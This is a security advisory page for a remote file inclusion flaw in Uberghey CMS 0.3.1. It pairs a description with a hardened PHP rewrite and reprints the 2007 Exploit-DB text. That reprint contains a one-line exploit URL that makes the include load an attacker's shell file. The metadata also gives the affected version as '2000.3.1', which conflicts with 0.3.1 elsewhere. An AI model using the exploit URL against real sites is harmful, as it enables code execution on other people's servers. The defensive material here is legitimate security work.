Vendor: Uberghey CMS
By: GolD_M (Mahmood_ali)
CVSS: 7.5 HIGH
Remote Code Execution
Product Name: Uberghey CMS
Affected Version From: 2000.3.1
Affected Version To: 2000.3.1
Patch Exists: NO
2007

Uberghey CMS 0.3.1 Remote Code Execution

Uberghey CMS 0.3.1 is vulnerable to remote code execution. The vulnerability is in the 'frontpage.php' file, on line 17, which includes a file from a path built with the 'setup_folder' parameter without proper input validation. An attacker can exploit this by supplying a specially crafted file path in the 'setup_folder' parameter, leading to the execution of arbitrary code.

Mitigation:

The vulnerability can be mitigated by ensuring proper input validation and sanitization of user-supplied input in the affected file.
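
The vulnerable include next to a hardened form, as an added example that is not code from Uberghey CMS or from the advisory's author. The `setup` directory, the language allowlist, the `resolve_page` helper and reading `language` and `page_id` from `$_GET` are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Vulnerable line quoted in the advisory (frontpage.php, line 17):
//   include("$setup_folder/i18n/$language/$page_id.inc");
// Hardened form: the base directory is fixed in code, never request-supplied.
const SETUP_FOLDER = __DIR__ . '/setup';   // assumed install layout
const LANGUAGES    = ['en', 'de'];         // assumed allowlist of shipped languages

// Hypothetical helper: returns the absolute path of the page fragment,
// or null when any input is rejected.
function resolve_page($language, $pageId, string $base = SETUP_FOLDER): ?string
{
    // Reject arrays and other non-string request values outright.
    if (!is_string($language) || !is_string($pageId)) {
        return null;
    }
    // Language must be one of the known values.
    if (!in_array($language, LANGUAGES, true)) {
        return null;
    }
    // Page id is a short identifier: no "/", "..", "?", ":" or NUL bytes.
    if (preg_match('/\A[a-z0-9_]{1,32}\z/', $pageId) !== 1) {
        return null;
    }
    // Resolve symlinks, then confirm the file exists under the i18n root.
    $root = realpath($base . '/i18n');
    $path = realpath("$base/i18n/$language/$pageId.inc");
    if ($root === false || $path === false) {
        return null;
    }
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage in the page script: request values only select among local files.
$file = resolve_page($_GET['language'] ?? 'en', $_GET['page_id'] ?? 'home');
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

Keeping `allow_url_include` set to `Off` in php.ini is a second layer that stops `include` from fetching URLs even if a path check is missed.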

Exploit-DB raw data:

/###################################################################\
# Uberghey CMS 0.3.1                                                #
# =========================================================         #
# Published : 2007-01-17                                            #
# Remote: Yes                                                       #
# Site:http://switch.dl.sourceforge.net/sourceforge/uberghey/       #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.cN                                             #
# =====================================================             #
# ThanX=All My Friends-ABDULLAH00-Dr.Hail-MoHaNdKo-SilVeR_FaLCoN-Z4E#
# SpeciaL GreeTz : TrYaG-Team & 4lKaSrGoLd3N-Team                   #
\###################################################################/
/###################################################################\
# In :                                                              #
# /frontpag.php                                                     #
# LiNe:                                                             #
# /17                                                               #
# Vulnerable Code:                                                  #
# include("$setup_folder/i18n/$language/$page_id.inc");             #
# ExPlOiT :                                                         #
# /frontpage.php?setup_folder=shell.txt?                            #
#                                                                   #
#                                                                   #
#             /#######################################\             #
#             #         TrYaG.Com & DwRaT.Com         #             #
#             \#######################################/             #
\############################MAHMOOD_ALI############################/

# milw0rm.com [2007-01-17]